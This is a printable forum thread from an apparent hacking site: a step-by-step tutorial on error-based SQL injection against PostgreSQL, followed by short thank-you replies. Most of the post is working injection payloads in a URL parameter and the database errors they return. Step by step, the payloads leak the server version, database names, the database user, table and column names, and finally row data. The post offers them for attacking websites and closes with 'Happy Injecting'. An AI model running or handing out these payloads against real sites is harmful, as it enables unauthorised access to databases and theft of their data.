SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki
PostgreSQL Injection (Error Base) - Printable Version

+- SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki (http://forum.sqliwiki.com)
+-- Forum: SQL Injection Tutorial (http://forum.sqliwiki.com/forumdisplay.php?fid=3)
+--- Forum: PostgreSQL Tutorial (http://forum.sqliwiki.com/forumdisplay.php?fid=13)
+--- Thread: PostgreSQL Injection (Error Base) (/showthread.php?tid=30)



PostgreSQL Injection (Error Base) - rootxforce - 10-17-2015

Lets start 

1st we knowing error 
Code: localhost/index.cfm?MenuID=80'

Pic: [Image: cLAJFS5.png]

ERROR: syntax error at or near "''"
its mean this website can be injectable.

2nd  Columns count:
Code:  localhost/index.cfm?MenuID=80 order by 1--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.

we will try with  UNION SELECT query:
Code:
Code:
localhost/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

so it's not working  !!!

ok ****** now Lets try with Errorbased Postgre SQLi…

Try to knowing Version
Code:
localhost/index.cfm?MenuID=80 and 1=cast(version() as int)--

Yes! success
CDbCommand gagal menjalankan statementSQL: SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for integer: "PostgreSQL 8.4.20 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-4), 64-bit" 

Pic: [Image: Ry00wRG.png]

so finally we got Version ******

ok now lets try to get database Name with error : 
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR:  invalid input syntax for integer: "template1" 
template1 is  database Name

pic: [Image: Cz6UGpy.png]

template1 is first database we can get others by changing offset Smile
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.

ok now try to find user:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--


ERROR: invalid input syntax for integer: "hilal_db_user" 

hilal_db_user is the user Smile

Pic: [Image: ldKbBzv.png]

now try to find  tables name

4th step:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--


ERROR: invalid input syntax for integer: "pg_type" 

pg_type is first table we can get others by changing offset Smile

pic: [Image: gqx2Yiz.png]

5th step:

Now we have to find the columns from our specific table !!!


e.g

our table is pg_type

for that we have to use oracle char conversion.Pg_type=  CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

ERROR: invalid input syntax for integer: "typname" 
and you can find other's  columns using offset.***

Last step:
Now we have to extract data from our column ***
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

ERROR: invalid input syntax for integer: "bool" 

Done.*** We are successfully inject Smile
Happy Injecting.***

***/r00txf0rc3


RE: PostgreSQL Injection (Error Base) - B3nG4L_Cyph3r - 10-17-2015

Nice share , Thanks Partner Wink


RE: PostgreSQL Injection (Error Base) - higgs_boson - 10-23-2015

Thanks for sharing *** Tongue


RE: PostgreSQL Injection (Error Base) - Malik Ubi - 02-22-2016

Nice tutorial :-)